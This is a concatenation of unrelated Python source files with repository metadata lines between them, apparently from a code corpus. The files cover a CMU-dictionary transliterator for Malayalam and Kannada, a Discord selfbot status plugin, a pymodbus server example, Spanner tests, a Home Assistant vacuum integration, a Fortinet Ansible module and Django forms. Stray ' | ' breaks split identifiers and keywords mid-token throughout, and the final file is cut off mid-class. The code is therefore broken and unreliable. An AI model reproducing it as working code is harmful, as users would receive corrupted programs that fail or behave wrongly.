# http://www.smc.org.in
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either versi | on 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have rec | eived a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# If you find any bugs or have any suggestions email: santhosh.thottingal@gmail.com
# URL: http://www.smc.org.in
import string
import os
CMU_MALAYALAM_MAP = {
"AA" : "ഓ",
"AH" : "അ",
"AE" : "ഏ",
"AO" : "ഓ",
"AW" : "ഔ",
"AY" : "ഐ",
"B" : "ബ്",
"CH" : "ച്ച്",
"D" : "ഡ്",
"DH" : "ദ്",
"EA" : "ഈ",
"EH" : "എ",
"ER" : "എര്",
"EY" : "എയ്",
"F" : "ഫ്",
"G" : "ഗ്",
"HH" : "ഹ്",
"IH" : "ഇ",
"IY" : "ഈ",
"J" : "ജ്",
"JH" : "ജ്",
"K" : "ക്",
"L" : "ല്",
"M" : "മ്",
"N" : "ന്",
"NG" : "ങ്",
"OW" : "ഒ",
"P" : "പ്",
"R" : "ര്",
"S" : "സ്",
"SH" : "ഷ്",
"T" : "റ്റ്",
"TH" : "ത്",
"Y" : "യ്",
"UW" : "ഉ",
"W" : "വ്",
"V" : "വ്",
"Z" : "സ്",
}
CMU_KANNADA_MAP = {
"AA" : "ಆ",
"AH" : "ಅ",
"AE" : "ಏ",
"AO" : "ಓ",
"AW" : "ಔ",
"AY" : "ಐ",
"B" : "ಬ್",
"CH" : "ಚ್",
"D" : "ಡ್",
"DH" : "ದ್",
"EA" : "ಈ",
"EH" : "ಎ",
"ER" : "ಅರ್",
"EY" : "ಎಯ್",
"F" : "ಫ್",
"G" : "ಗ್",
"HH" : "ಹ್",
"IH" : "ಇ",
"IY" : "ಈ",
"J" : "ಜ್",
"JH" : "ಜ್",
"K" : "ಕ್",
"L" : "ಲ್",
"M" : "ಮ್",
"N" : "ನ್",
"NG" : "ಂಗ್",
"OW" : "ಒ",
"P" : "ಪ್",
"R" : "ರ್",
"S" : "ಸ್",
"SH" : "ಷ್",
"T" : "ಟ್",
"TH" : "ತ್",
"Y" : "ಯ್",
"UW" : "ಊ",
"UH":"ಉ",
"W" : "ವ್",
"V" : "ವ್",
"Z":"ಸ್",
"ZH":"ಷ್",
}
class CMUDict():
    """Lookup and Indic-script transliteration of the CMU pronouncing
    dictionary (SPHINX 40-phone set).

    The dictionary file is loaded lazily on first :meth:`find` call.
    """
    def __init__(self):
        self.dictionaryfile=os.path.join(os.path.dirname(__file__), 'cmudict.0.7a_SPHINX_40')
        # word -> list of CMU phoneme symbols; None until loaded.
        self.cmudictionary = None
    def load(self):
        """Parse the dictionary file into ``self.cmudictionary``."""
        # Fix: the file handle was previously never closed; use a context
        # manager so it is always released.
        with open(self.dictionaryfile, "r") as fdict:
            flines = fdict.readlines()
        self.cmudictionary = dict()
        for line in flines:
            line = line.strip()
            # Robustness: skip blank lines instead of crashing on split()[0].
            if not line:
                continue
            parts = line.split()
            # First token is the word, the rest are its phonemes.
            self.cmudictionary[parts[0]] = parts[1:]
    def find(self, word):
        """Return the phoneme list for *word* (case-insensitive).

        Raises KeyError when the word is not in the dictionary.
        """
        if self.cmudictionary is None:
            self.load()
        return self.cmudictionary[word.upper()]
    def pronunciation(self,word, language):
        """Transliterate *word* into the given language ('ml_IN'/'kn_IN').

        Trailing punctuation is preserved; unknown words are returned
        unchanged.  (Python 2 code: builds a UTF-8 byte string and decodes
        it at the end.)
        """
        stripped_word = word.strip('!,.?:')
        punctuations = word[len(stripped_word):]
        try:
            cmu_pronunciation = self.find(stripped_word)
        except KeyError:
            #print "could not find the word " + stripped_word + " in dictionary"
            return word
        pronunciation_str = ""
        if language =="ml_IN":
            for syl in cmu_pronunciation:
                try:
                    pronunciation_str += CMU_MALAYALAM_MAP[syl]
                except KeyError:
                    # Unmapped phonemes pass through untranslated.
                    pronunciation_str += syl
            pronunciation_str = self._fix_vowel_signs_ml(pronunciation_str)
        if language == "kn_IN":
            for symbol in cmu_pronunciation:
                try:
                    pronunciation_str += CMU_KANNADA_MAP[symbol]
                except KeyError:
                    pronunciation_str += symbol
            pronunciation_str = self._fix_vowel_signs_kn(pronunciation_str)
        return (pronunciation_str).decode("utf-8") + punctuations
    def _fix_vowel_signs_ml(self,text) :
        # Collapse virama + independent vowel sequences into the proper
        # Malayalam vowel signs (plus a few consonant-cluster fixups).
        text= text.replace("്അ","")
        text= text.replace("്അ","")
        text= text.replace("്ആ","ാ")
        text= text.replace("്ആ","ാ")
        text= text.replace("്ഇ","ി")
        text= text.replace("്ഇ","ി")
        text= text.replace("്ഈ","ീ")
        text= text.replace("്ഈ","ീ")
        text= text.replace("്ഉ","ു")
        text= text.replace("്ഉ","ു")
        text= text.replace("്ഊ","ൂ")
        text= text.replace("്ഊ","ൂ")
        text= text.replace("്റ","്ര")
        text= text.replace("്എ","െ")
        text= text.replace("്എ","")
        text= text.replace("്ഏ","േ")
        text= text.replace("്ഏ","േ")
        text= text.replace("്ഐ","ൈ")
        text= text.replace("്ഐ","ൈ")
        text= text.replace("്ഒ","ൊ")
        text= text.replace("്ഒ","ൊ")
        text= text.replace("്ഓ","ോ")
        text= text.replace("്ഓ","ോ")
        text= text.replace("്ഔ","ൌ")
        text= text.replace("്ഔ","ൌ")
        text= text.replace("ര്ര","റ്റ")
        text= text.replace("റ്ര","റ്റ")
        text= text.replace("ന്റ്റ","ന്റ")
        return text
    def _fix_vowel_signs_kn(self,text) :
        # Collapse virama + independent vowel sequences into the proper
        # Kannada vowel signs.
        text= text.replace("್ಅ","")
        text= text.replace("್ಆ","ಾ")
        text= text.replace("್ಇ","ಿ")
        text= text.replace("್ಈ","ೀ")
        text= text.replace("್ಉ","ು")
        text= text.replace("್ಊ","ೂ")
        text= text.replace("್ಋ","ೃ")
        text= text.replace("್ಎ","ೆ")
        text= text.replace("್ಏ","ೇ")
        text= text.replace("್ಐ","ೈ")
        text= text.replace("್ಒ","ೊ")
        text= text.replace("್ಓ","ೋ")
        text= text.replace("್ಔ","ೌ")
        return text
|
tekulvw/Squid-Plugins | selfbotstatus/selfbotstatus.py | Python | mit | 1,817 | 0 | import keyboard as kb
import time
import discord
import asyncio
class SelfBotStatus:
def __init__(self, bot):
self.bot = bot
self.is_online = True
self._last_time = 0
kb.hook(self.kb_press)
self.status_task = None
self.start = False
def __unload(self):
try:
self.status_task.cancel()
except AttributeError:
pass
def kb_press(self, event):
if not self.start:
return
etime = event.time
if self.is_online is True:
try:
self.status_task.cancel()
except AttributeError:
pass
self.status_task = self.bot.loop.create_task(
self._set_idle(etime + 300))
elif self.is_online is False:
self.status_task = self.bot.loop.create_task(
self._set_online())
self._last_time = etime
def _get_game(self):
try:
me = list(self.bot.servers)[0].me
game = me.game
except IndexError:
game = None
return game
async def _set_idle(self, ttl):
while time.time() < ttl:
asyncio.sleep(1)
game = self._get_game()
await self.bot.change_presence(game=game, status=discord.Status.idle,
afk=True)
self.is_online = False
async def _set_online(self, ttl=0):
while time.time() < ttl:
asyncio.sleep(1)
game = self._get_game()
await self.bot.change_presence(game=game, | st | atus=discord.Status.online,
afk=False)
self.is_online = True
async def on_ready(self):
self.start = True
def setup(bot):
bot.add_cog(SelfBotStatus(bot))
|
mjfarmer/scada_py | pymodbus/examples/common/callback-server.py | Python | gpl-3.0 | 5,075 | 0.010443 | #!/usr/bin/env python
'''
Pymodbus Server With Callbacks
--------------------------------------------------------------------------
This is an example of adding callbacks to a running modbus server
when a value is written to it. In order for this to work, it needs
a device-mapping file.
'''
#---------------------------------------------------------------------------#
# import the modbus libraries we need
#---------------------------------------------------------------------------#
from pymodbus.server.async import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
#---------------------------------------------------------------------------#
# import the python libraries we need
#---------------------------------------------------------------------------#
from multiprocessing import Queue, Process
#---------------------------------------------------------------------------#
# configure the service logging
#---------------------------------------------------------------------------#
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
#---------------------------------------------------------------------------#
# create your custom data block with callbacks
#---------------------------------------------------------------------------#
class CallbackDataBlock(ModbusSparseDataBlock):
''' A datablock that stores the new value in memory
and passes the operation to a message queue for further
processing.
'''
def __init__(self, devices, queue):
'''
'''
self.devices = devices
self.queue = queue
values = {k:0 for k in devices.iterkeys()}
values[0xbeef] = len(values) # the number of devices
super(CallbackDataBlock, | self).__init__(values)
def setValues(self, address, value):
| ''' Sets the requested values of the datastore
:param address: The starting address
:param values: The new values to be set
'''
super(CallbackDataBlock, self).setValues(address, value)
self.queue.put((self.devices.get(address, None), value))
#---------------------------------------------------------------------------#
# define your callback process
#---------------------------------------------------------------------------#
def rescale_value(value):
''' Rescale the input value from the range
of 0..100 to -3200..3200.
:param value: The input value to scale
:returns: The rescaled value
'''
s = 1 if value >= 50 else -1
c = value if value < 50 else (value - 50)
return s * (c * 64)
def device_writer(queue):
''' A worker process that processes new messages
from a queue to write to device outputs
:param queue: The queue to get new messages from
'''
while True:
device, value = queue.get()
scaled = rescale_value(value[0])
log.debug("Write(%s) = %s" % (device, value))
if not device: continue
# do any logic here to update your devices
#---------------------------------------------------------------------------#
# initialize your device map
#---------------------------------------------------------------------------#
def read_device_map(path):
''' A helper method to read the device
path to address mapping from file::
0x0001,/dev/device1
0x0002,/dev/device2
:param path: The path to the input file
:returns: The input mapping file
'''
devices = {}
with open(path, 'r') as stream:
for line in stream:
piece = line.strip().split(',')
devices[int(piece[0], 16)] = piece[1]
return devices
#---------------------------------------------------------------------------#
# initialize your data store
#---------------------------------------------------------------------------#
queue = Queue()
devices = read_device_map("device-mapping")
block = CallbackDataBlock(devices, queue)
store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
#---------------------------------------------------------------------------#
# initialize the server information
#---------------------------------------------------------------------------#
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/bashwork/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = '1.0'
#---------------------------------------------------------------------------#
# run the server you want
#---------------------------------------------------------------------------#
p = Process(target=device_writer, args=(queue,))
p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
|
hasgeek/lastuser | lastuser_ui/views/index.py | Python | bsd-2-clause | 174 | 0 | # -*- coding: | utf-8 -*-
from flask import render_template
from .. import lastuser_ui
@lastuser_ui.route('/')
def | index():
return render_template('index.html.jinja2')
|
jonparrott/google-cloud-python | spanner/tests/unit/test_streamed.py | Python | apache-2.0 | 40,891 | 0 | # Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
class TestStreamedResultSet(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.streamed import StreamedResultSet
return StreamedResultSet
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_defaults(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
self.assertIs(streamed._response_iterator, iterator)
self.assertIsNone(streamed._source)
self.assertEqual(list(streamed), [])
self.assertIsNone(streamed.metadata)
self.assertIsNone(streamed.stats)
def test_ctor_w_source(self):
iterator = _MockCancellableIterator()
source = object()
streamed = self._make_one(iterator, source=source)
self.assertIs(streamed._response_iterator, iterator)
self.assertIs(streamed._source, source)
self.assertEqual(list(streamed), [])
self.assertIsNone(streamed.metadata)
self.assertIsNone(streamed.stats)
def test_fields_unset(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
with self.assertRaises(AttributeError):
streamed.fields
@staticmethod
def _make_scalar_field(name, type_):
from google.cloud.spanner_v1.proto.type_pb2 import StructType
from google.cloud.spanner_v1.proto.type_pb2 import Type
return StructType.Field(name=name, type=Type(code=type_))
@staticmethod
def _make_array_field(name, element_type_code=None, element_type=None):
from google.cloud.spanner_v1.proto.type_pb2 import StructType
from google.cloud.spanner_v1.proto.type_pb2 import Type
if element_type is None:
element_type = Type(code=element_type_code)
array_type = Type(
code='ARRAY', array_element_type=element_type)
return StructType.Field(name=name, type=array_type)
@staticmethod
def _make_struct_type(struct_type_fields):
from google.cloud.spanner_v1.proto.type_pb2 import StructType
from google.cloud.spanner_v1.proto.type_pb2 import Type
fields = [
StructType.Field(name=key, type=Type(code=value))
for key, value in struct_type_fields
]
struct_type = StructType(fields=fields)
return Type(code='STRUCT', struct_type=struct_type)
@staticmethod
def _make_value(value):
from google.cloud.spanner_v1._helpers import _make_value_pb
return _make_value_pb(value)
@staticmethod
def _make_list_value(values=(), value_pbs=None):
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Value
from google.cloud.spanner_v1._helpers import _make_list_value_pb
if value_pbs is not None:
return Value(list_value=ListValue(values=value_pbs))
return Value(list_value=_make_list_value_pb(values))
@staticmethod
def _make_result_set_metadata(fields=(), transaction_id=None):
from google.cloud.spanner_v1.proto.result_set_pb2 import (
ResultSetMetadata)
metadata = ResultSetMetadata()
for field in fields:
metadata.row_type.fields.add().CopyFrom(field)
if transaction_id is not None:
metadata.transaction.id = transaction_id
return metadata
@staticmethod
def _make_result_set_stats(query_plan=None, **kw):
from google.cloud.spanner_v1.proto.result_set_pb2 import (
ResultSetStats)
from google.protobuf.struct_pb2 import Struct
from google.cloud.spanner_v1._helpers import _make_value_pb
query_stats = Struct(fields={
key: _make_value_pb(value) for key, value in kw.items()})
return ResultSetStats(
query_plan=query_plan,
query_stats=query_stats,
)
@staticmethod
def _make_partial_result_set(
values, metadata=None, stats=None, chunked_value=False):
from google.cloud.spanner_v1.proto.result_set_pb2 import (
PartialResultSet)
return PartialResultSet(
values=values,
metadata=metadata,
stats=stats,
chunked_value=chunked_value,
)
def test_properties_set(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('full_name', 'STRING'),
self._make_scalar_field('age', 'INT64'),
]
metadata = streamed._metadata = self._make_result_set_metadata(FIELDS)
stats = streamed._stats = self._make_result_set_stats()
self.assertEqual(list(streamed.fields), FIELDS)
self.assertIs(streamed.metadata, metadata)
self.assertIs(streamed.stats, stats)
def test__merge_chunk_bool(self):
from google.cloud.spanner_v1.streamed import Unmergeable
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('registered_voter', 'BOOL'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(True)
chunk = self._make_value(False)
with self.assertRaises(Unmergeable):
streamed._merge_chunk(chunk)
def t | est__merge_chunk_int64(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('age', 'INT64'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(42)
chunk = self._make_value(13)
merged = streamed._merge_chunk(chunk)
self.assertEqual(merged.string_value, '4213')
self.assertIsNon | e(streamed._pending_chunk)
def test__merge_chunk_float64_nan_string(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('weight', 'FLOAT64'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(u'Na')
chunk = self._make_value(u'N')
merged = streamed._merge_chunk(chunk)
self.assertEqual(merged.string_value, u'NaN')
def test__merge_chunk_float64_w_empty(self):
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('weight', 'FLOAT64'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(3.14159)
chunk = self._make_value('')
merged = streamed._merge_chunk(chunk)
self.assertEqual(merged.number_value, 3.14159)
def test__merge_chunk_float64_w_float64(self):
from google.cloud.spanner_v1.streamed import Unmergeable
iterator = _MockCancellableIterator()
streamed = self._make_one(iterator)
FIELDS = [
self._make_scalar_field('weight', 'FLOAT64'),
]
streamed._metadata = self._make_result_set_metadata(FIELDS)
streamed._pending_chunk = self._make_value(3.14159)
chunk = self._make_value(2.71828)
with self.assertRaises(Unmergeable):
streamed._merge_chunk(chunk)
def test__merge_chunk_string(self):
iterator = |
mezz64/home-assistant | homeassistant/components/ecovacs/vacuum.py | Python | apache-2.0 | 6,203 | 0.000645 | """Support for Ecovacs Ecovacs Vaccums."""
from __future__ import annotations
import logging
import sucks
from homeassistant.components.vacuum import (
SUPPORT_BATTERY,
SUPPORT_CLEAN_SPOT,
SUPPORT_FAN_SPEED,
SUPPORT_LOCATE,
SUPPORT_RETURN_HOME,
SUPPORT_SEND_COMMAND,
SUPPORT_STATUS,
SUPPORT_STOP,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
VacuumEntity,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.icon import icon_for_battery_level
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
from . import ECOVACS_DEVICES
_LOGGER = logging.getLogger(__name__)
SUPPORT_ECOVACS = (
SUPPORT_BATTERY
| SUPPORT_RETURN_HOME
| SUPPORT_CLEAN_SPOT
| SUPPORT_STOP
| SUPPORT_TURN_OFF
| SUPPORT_TURN_ON
| SUPPORT_LOCATE
| SUPPORT_STATUS
| SUPPORT_SEND_COMMAND
| SUPPORT_FAN_SPEED
)
ATTR_ERROR = "error"
ATTR_COMPONENT_PREFIX = "component_"
def setup_platform(
hass: HomeA | ssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: Discovery | InfoType | None = None,
) -> None:
"""Set up the Ecovacs vacuums."""
vacuums = []
for device in hass.data[ECOVACS_DEVICES]:
vacuums.append(EcovacsVacuum(device))
_LOGGER.debug("Adding Ecovacs Vacuums to Home Assistant: %s", vacuums)
add_entities(vacuums, True)
class EcovacsVacuum(VacuumEntity):
"""Ecovacs Vacuums such as Deebot."""
def __init__(self, device):
"""Initialize the Ecovacs Vacuum."""
self.device = device
self.device.connect_and_wait_until_ready()
if self.device.vacuum.get("nick") is not None:
self._name = str(self.device.vacuum["nick"])
else:
# In case there is no nickname defined, use the device id
self._name = str(format(self.device.vacuum["did"]))
self._fan_speed = None
self._error = None
_LOGGER.debug("Vacuum initialized: %s", self.name)
async def async_added_to_hass(self) -> None:
"""Set up the event listeners now that hass is ready."""
self.device.statusEvents.subscribe(lambda _: self.schedule_update_ha_state())
self.device.batteryEvents.subscribe(lambda _: self.schedule_update_ha_state())
self.device.lifespanEvents.subscribe(lambda _: self.schedule_update_ha_state())
self.device.errorEvents.subscribe(self.on_error)
def on_error(self, error):
"""Handle an error event from the robot.
This will not change the entity's state. If the error caused the state
to change, that will come through as a separate on_status event
"""
if error == "no_error":
self._error = None
else:
self._error = error
self.hass.bus.fire(
"ecovacs_error", {"entity_id": self.entity_id, "error": error}
)
self.schedule_update_ha_state()
@property
def should_poll(self) -> bool:
"""Return True if entity has to be polled for state."""
return False
@property
def unique_id(self) -> str:
"""Return an unique ID."""
return self.device.vacuum.get("did")
@property
def is_on(self):
"""Return true if vacuum is currently cleaning."""
return self.device.is_cleaning
@property
def is_charging(self):
"""Return true if vacuum is currently charging."""
return self.device.is_charging
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def supported_features(self):
"""Flag vacuum cleaner robot features that are supported."""
return SUPPORT_ECOVACS
@property
def status(self):
"""Return the status of the vacuum cleaner."""
return self.device.vacuum_status
def return_to_base(self, **kwargs):
"""Set the vacuum cleaner to return to the dock."""
self.device.run(sucks.Charge())
@property
def battery_icon(self):
"""Return the battery icon for the vacuum cleaner."""
return icon_for_battery_level(
battery_level=self.battery_level, charging=self.is_charging
)
@property
def battery_level(self):
"""Return the battery level of the vacuum cleaner."""
if self.device.battery_status is not None:
return self.device.battery_status * 100
return super().battery_level
@property
def fan_speed(self):
"""Return the fan speed of the vacuum cleaner."""
return self.device.fan_speed
@property
def fan_speed_list(self):
"""Get the list of available fan speed steps of the vacuum cleaner."""
return [sucks.FAN_SPEED_NORMAL, sucks.FAN_SPEED_HIGH]
def turn_on(self, **kwargs):
"""Turn the vacuum on and start cleaning."""
self.device.run(sucks.Clean())
def turn_off(self, **kwargs):
"""Turn the vacuum off stopping the cleaning and returning home."""
self.return_to_base()
def stop(self, **kwargs):
"""Stop the vacuum cleaner."""
self.device.run(sucks.Stop())
def clean_spot(self, **kwargs):
"""Perform a spot clean-up."""
self.device.run(sucks.Spot())
def locate(self, **kwargs):
"""Locate the vacuum cleaner."""
self.device.run(sucks.PlaySound())
def set_fan_speed(self, fan_speed, **kwargs):
"""Set fan speed."""
if self.is_on:
self.device.run(sucks.Clean(mode=self.device.clean_status, speed=fan_speed))
def send_command(self, command, params=None, **kwargs):
"""Send a command to a vacuum cleaner."""
self.device.run(sucks.VacBotCommand(command, params))
@property
def extra_state_attributes(self):
"""Return the device-specific state attributes of this vacuum."""
data = {}
data[ATTR_ERROR] = self._error
for key, val in self.device.components.items():
attr_name = ATTR_COMPONENT_PREFIX + key
data[attr_name] = int(val * 100)
return data
|
obi-two/Rebelion | data/scripts/templates/object/mobile/shared_moncal_female.py | Python | mit | 441 | 0.047619 | #### NOTICE: THIS FILE IS A | UTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_moncal_female.iff"
result.attribute_template_id = 9
result.stfName("npc_name","moncal_base_fe | male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result |
voidfiles/incursion | tests/test_client.py | Python | mit | 1,150 | 0.00087 | imp | ort incursion as indb
from .utils import InfluxDBClientTest
class TestResponseParser(InfluxDBClientTest):
def test_simple(self):
self.generateData()
query = indb.q('page_views').limit(None)
resp = indb.get_result(query, conn=self.client)
series = resp.get('page_views')
self.assertEqual(len(list(series)), len(self.points))
query = query.limit(10)
resp = indb.get_result(query, conn=self.client)
| series = resp.get('page_views')
assert len(list(series)) == 10
query = indb.q('page_views').columns(indb.count('category_id')).limit(None)
resp = indb.get_result(query, conn=self.client)
series = resp.get('page_views')
self.assertEqual(list(series)[0].count, len(self.points))
def test_groups(self):
self.generateData()
q = indb.q('page_views').columns(indb.count('category_id'))
q = q.limit(None)
q = q.group_by(indb.time('1h'))
resp = indb.get_result(q, conn=self.client)
series = resp.get('page_views')
assert sum(map(lambda x: x.count, series)) == len(self.points)
|
Dhivyap/ansible | lib/ansible/modules/network/fortios/fortios_user_security_exempt_list.py | Python | gpl-3.0 | 13,462 | 0.001931 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_user_security_exempt_list
short_description: Configure security exemption list in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS (FOS) device by allowing the
user to set and modify user feature and security_exempt_list category.
Examples include all parameters and values need to be adjusted to datasources before usage.
Tested with FOS v6.0.5
version_added: "2.9"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate IP address.
type: str
required: false
username:
description:
- FortiOS or FortiGate username.
type: str
required: false
password:
description:
- FortiOS or FortiGate password.
type: str
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
type: str
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS protocol.
type: bool
default: true
ssl_verify:
description:
- Ensures FortiGate certificate must be verified by a proper CA.
type: bool
default: true
state:
description:
- Indicates whether to create or remove the object.
type: str
required: true
choices:
- present
- absent
user_security_exempt_list:
description:
- Configure security exemption list.
default: null
type: dict
suboptions:
description:
description:
- Description.
type: str
name:
description:
- Name of the exempt list.
required: true
type: str
rule:
description:
- Configure rules for exempting users from captive portal authentication.
type: list
suboptions:
devices:
description:
- Devices or device groups.
type: list
suboptions:
name:
description:
- Device or group name. Source user.device.alias user.device-group.name user.device-category.name.
required: true
type: str
dstaddr:
description:
- Destination addresses or address groups.
type: list
suboptions:
name:
description:
- Address or group name. Source firewall.address.name firewall.addrgrp.name.
required: true
type: str
id:
description:
- ID.
required: true
type: int
service:
description:
- Destination services.
type: list
suboptions:
name:
description:
- Service name. Source firewall.service.custom.name firewall.service.group.name.
required: true
type: str
srcaddr:
description:
- Source addresses or address groups.
type: list
suboptions:
name:
description:
- Address or group name. Source firewall.address.name firewall.addrgrp.name.
required: true
type: str
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
ssl_verify: "False"
tasks:
- name: Configure security exemption list.
fortios_user_security_exempt_list:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
stat | e: "present"
user_security_exempt_list:
d | escription: "<your_own_value>"
name: "default_name_4"
rule:
-
devices:
-
name: "default_name_7 (source user.device.alias user.device-group.name user.device-category.name)"
dstaddr:
-
name: "default_name_9 (source firewall.address.name firewall.addrgrp.name)"
id: "10"
service:
-
name: "default_name_12 (source firewall.service.custom.name firewall.service.group.name)"
srcaddr:
-
name: "default_name_14 (source firewall.address.name firewall.addrgrp.name)"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.connection import Connection
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
from ansible.module_utils.network.fortimanager.common import FAIL_SOCKET_MSG
def login(data, fos):
host = data['host |
cschenck/blender_sim | fluid_sim_deps/blender-2.69/2.69/scripts/presets/tracking_camera/Canon_1D.py | Python | gpl-3.0 | 219 | 0 | import bpy
camera = bpy.context.edit_movieclip.tracking.camera
camera.sensor | _width = 27.9
camera.units = 'MILLIMETERS'
camera.focal_length = 24.0
camera.pixel_aspect = | 1
camera.k1 = 0.0
camera.k2 = 0.0
camera.k3 = 0.0
|
jjneely/webkickstart | archive/centos5.py | Python | gpl-2.0 | 1,227 | 0.00163 | #!/usr/bin/python
#
# centos5.py - A webKickstart module to handle changes needed from
# RHEL 5 to CentOS 5 Kickstart generation.
#
# Copyright 2007 NC State University
# Written by Jack Neely <jjneely@ncsu.edu>
#
# SDG
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that | it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
| # along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
from baseRealmLinuxKickstart import baseRealmLinuxKickstart
class Kickstart(baseRealmLinuxKickstart):
def __init__(self, url, cfg, sc=None):
baseRealmLinuxKickstart.__init__(self, url, cfg, sc)
self.buildOrder.remove(self.installationNumber)
self.buildOrder.remove(self.RHN)
|
bewareoftheapp/fluxapp | expense/forms.py | Python | mit | 749 | 0 | from .models import Budget, Reimburse
from django.forms import ModelForm
class BudgetForm(ModelForm):
'''Form for expense.models.Budget model.'''
class Meta: # pylint: disable=missing-docstring
model = Budget
fields = [
'value',
'description',
]
labels = {
'val | ue': 'Valor',
'description': 'Descrição'
}
class ReimburseForm(ModelForm):
'''Form for expense.models.Reimburse model.'''
